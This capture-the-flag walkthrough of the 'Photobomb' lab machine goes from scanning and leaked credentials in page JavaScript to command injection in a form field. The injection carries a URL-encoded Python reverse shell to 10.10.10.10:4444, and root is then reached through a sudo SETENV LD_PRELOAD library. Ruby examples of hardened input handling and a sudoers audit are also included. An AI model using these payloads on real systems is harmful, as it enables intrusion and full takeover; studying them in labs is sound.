Nmap scan with default scripts and version detection.
Starting Nmap 7.93 ( https://nmap.org ) at 2022-11-29 15:43 MST
Nmap scan report for 10.10.11.182
Host is up (0.068s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 e22473bbfbdf5cb520b66876748ab58d (RSA)
| 256 04e3ac6e184e1b7effac4fe39dd21bae (ECDSA)
|_ 256 20e05d8cba71f08c3a1819f24011d29e (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://photobomb.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.67 seconds
Run feroxbuster to find more pages. It only finds /printer, which is also linked from the main page.
$ feroxbuster --url http://photobomb.htb -w /usr/share/payloads/SecLists/Discovery/Web-Content/raft-medium-directories.txt
200 GET 22l 95w 843c http://photobomb.htb/
401 GET 7l 12w 188c http://photobomb.htb/printer
401 GET 7l 12w 188c http://photobomb.htb/printers
401 GET 7l 12w 188c http://photobomb.htb/printer_friendly
401 GET 7l 12w 188c http://photobomb.htb/printerfriendly
401 GET 7l 12w 188c http://photobomb.htb/printer-friendly
[####################] - 2m 60000/60000 0s found:6 errors:0
[####################] - 2m 30000/30000 248/s http://photobomb.htb
[####################] - 2m 30000/30000 248/s http://photobomb.htb/
Inspect photobomb.js on the main page. It contains credentials; use those to log into /printer.
function init() {
  // Jameson: pre-populate creds for tech support as they keep forgetting them and emailing me
  if (document.cookie.match(/^(.*;)?\s*isPhotoBombTechSupport\s*=\s*[^;]+(.*)?$/)) {
    document.getElementsByClassName('creds')[0].setAttribute('href','http://pH0...:...Mb!@photobomb.htb/printer');
  }
}
window.onload = init;
Capture the image download request.
POST /printer HTTP/1.1
Host: photobomb.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 79
Origin: http://photobomb.htb
Authorization: Basic cEgwdDA6YjBNYiE=
Connection: close
Referer: http://photobomb.htb/printer
Upgrade-Insecure-Requests: 1
DNT: 1
Sec-GPC: 1

photo=almas-salakhov-VK7TCqcZTlw-unsplash.jpg&filetype=png&dimensions=3000x2000
The filetype parameter is vulnerable to command injection. Append a Python reverse shell after a semicolon and URL-encode it.
POST /printer HTTP/1.1
Host: photobomb.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 79
Origin: http://photobomb.htb
Authorization: Basic cEgwdDA6YjBNYiE=
Connection: close
Referer: http://photobomb.htb/printer
Upgrade-Insecure-Requests: 1
DNT: 1
Sec-GPC: 1

photo=almas-salakhov-VK7TCqcZTlw-unsplash.jpg&filetype=png;python3%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket%28socket.AF_INET%2Csocket.SOCK_STREAM%29%3Bs.connect%28%28%2210.10.10.10%22%2C4444%29%29%3Bos.dup2%28s.fileno%28%29%2C0%29%3Bos.dup2%28s.fileno%28%29%2C1%29%3Bos.dup2%28s.fileno%28%29%2C2%29%3Bp%3Dsubprocess.call%28%5B%22%2Fbin%2Fsh%22%2C%22-i%22%5D%29%3B%27&dimensions=3000x2000
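Why the semicolon works, and how the handler should have been written, as an added Ruby example that is not the box's server.rb: the converter name (convert), the directory layout and the field names beyond those in the request are assumptions. The hardened handler allowlists every field and returns an argv array, so no shell ever parses user input.

```ruby
# Added example, not the box's server.rb. "convert" and the paths are assumptions.
ALLOWED_TYPES = %w[png jpg].freeze
DIMENSIONS_RE = /\A(\d{1,4})x(\d{1,4})\z/
PHOTO_RE      = /\A[A-Za-z0-9._-]+\.jpg\z/

# Vulnerable pattern: one string handed to /bin/sh through system().
# A filetype of "png;python3 -c '...'" ends the convert command and
# runs whatever follows the semicolon, which is what the request above does.
def unsafe_resize_command(photo, filetype, dimensions)
  "convert public/images/#{photo} -resize #{dimensions} resized_images/#{photo}.#{filetype}"
end

class BadRequest < StandardError; end

# Hardened: reject anything outside the allowlist, then build an argv array.
# system(*argv) / Process.spawn(*argv) exec the binary directly, no shell involved.
def safe_resize_argv(photo, filetype, dimensions)
  raise BadRequest, "bad photo name" unless PHOTO_RE.match?(photo)
  raise BadRequest, "bad filetype"   unless ALLOWED_TYPES.include?(filetype)
  m = DIMENSIONS_RE.match(dimensions)
  raise BadRequest, "bad dimensions" unless m
  w, h = m[1].to_i, m[2].to_i
  raise BadRequest, "dimensions out of range" unless (1..4000).cover?(w) && (1..4000).cover?(h)
  ["convert", "public/images/#{photo}", "-resize", "#{w}x#{h}",
   "resized_images/#{File.basename(photo, '.jpg')}.#{filetype}"]
end

# True when the hardened handler would refuse the request.
def rejected?(photo, filetype, dimensions)
  safe_resize_argv(photo, filetype, dimensions)
  false
rescue BadRequest
  true
end
```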
Boom, shell.
$ nc -nlvp 4444
Listening on 0.0.0.0 4444
Connection received on 10.10.11.182 47022
/bin/sh: 0: can't access tty; job control turned off
$ ls
log
photobomb.sh
public
resized_images
server.rb
syntaxhighlight_images
$ id
uid=1000(wizard) gid=1000(wizard) groups=1000(wizard)
Check sudo -l: /opt/cleanup.sh runs as root with no password and with SETENV.
$ sudo -l
Matching Defaults entries for wizard on photobomb:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User wizard may run the following commands on photobomb:
(root) SETENV: NOPASSWD: /opt/cleanup.sh
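A defender's check for the misconfiguration that makes the rest of this box possible, as an added Ruby example (not from the box): it parses `sudo -l` style output and flags rules tagged SETENV. SETENV lets the invoking user hand arbitrary environment variables, LD_PRELOAD included, to a process that sudo would otherwise run with a reset environment. The sample text is constructed from the lines shown above.

```ruby
# Added example, not from the box. Sample constructed from the sudo -l output above.
SAMPLE_SUDO_L = <<~'OUT'
  Matching Defaults entries for wizard on photobomb:
      env_reset, mail_badpass,
      secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
  User wizard may run the following commands on photobomb:
      (root) SETENV: NOPASSWD: /opt/cleanup.sh
      (root) NOPASSWD: /usr/bin/systemctl restart nginx
OUT

Finding = Struct.new(:runas, :tags, :command, :severity, :reason)

# Matches rule lines such as "(root) SETENV: NOPASSWD: /opt/cleanup.sh":
# run-as user in parentheses, zero or more "TAG:" entries, then the command.
RULE_RE = /\A\s*\(([^)]+)\)\s*((?:[A-Z_]+:\s*)*)(.+?)\s*\z/

# Returns one Finding per rule that carries a risky tag; other rules are skipped.
def audit_sudo_rules(text)
  text.each_line.filter_map do |line|
    m = RULE_RE.match(line) or next
    runas, tagstr, cmd = m.captures
    tags = tagstr.scan(/[A-Z_]+/)
    reasons = []
    # SETENV overrides env_reset, so LD_PRELOAD/LD_LIBRARY_PATH reach the target.
    reasons << "SETENV lets the caller inject LD_PRELOAD into a root process" if tags.include?("SETENV")
    reasons << "NOPASSWD removes the authentication step" if tags.include?("NOPASSWD")
    next if reasons.empty?
    sev = tags.include?("SETENV") && runas == "root" ? "high" : "info"
    Finding.new(runas, tags, cmd, sev, reasons.join("; "))
  end
end

if __FILE__ == $PROGRAM_NAME
  audit_sudo_rules(SAMPLE_SUDO_L).each do |f|
    puts "#{f.severity.upcase}: (#{f.runas}) #{f.command} [#{f.tags.join(',')}] - #{f.reason}"
  end
end
```

The fix on the sudoers side is to drop the SETENV tag (and the NOPASSWD tag if it is not strictly needed); `sudo -l` as each user is a cheap way to re-check after the change.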
Do some reading on SETENV with LD_PRELOAD. Check secure_path, and use /usr/bin/bash rather than the /bin/sh used in the article. Create sour.c:
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>

/* Runs when the library is loaded via LD_PRELOAD (built with -nostartfiles). */
void _init() {
    unsetenv("LD_PRELOAD");   /* stop the library re-loading into the child shell */
    setgid(0);
    setuid(0);
    system("/usr/bin/bash");  /* full path: secure_path does not include the cwd */
}
Compile
gcc -fPIC -shared -o sour.so sour.c -nostartfiles
Upload and execute
$ pwd
/tmp
$ sudo LD_PRELOAD=/tmp/sour.so /opt/cleanup.sh
id
uid=0(root) gid=0(root) groups=0(root)
Done!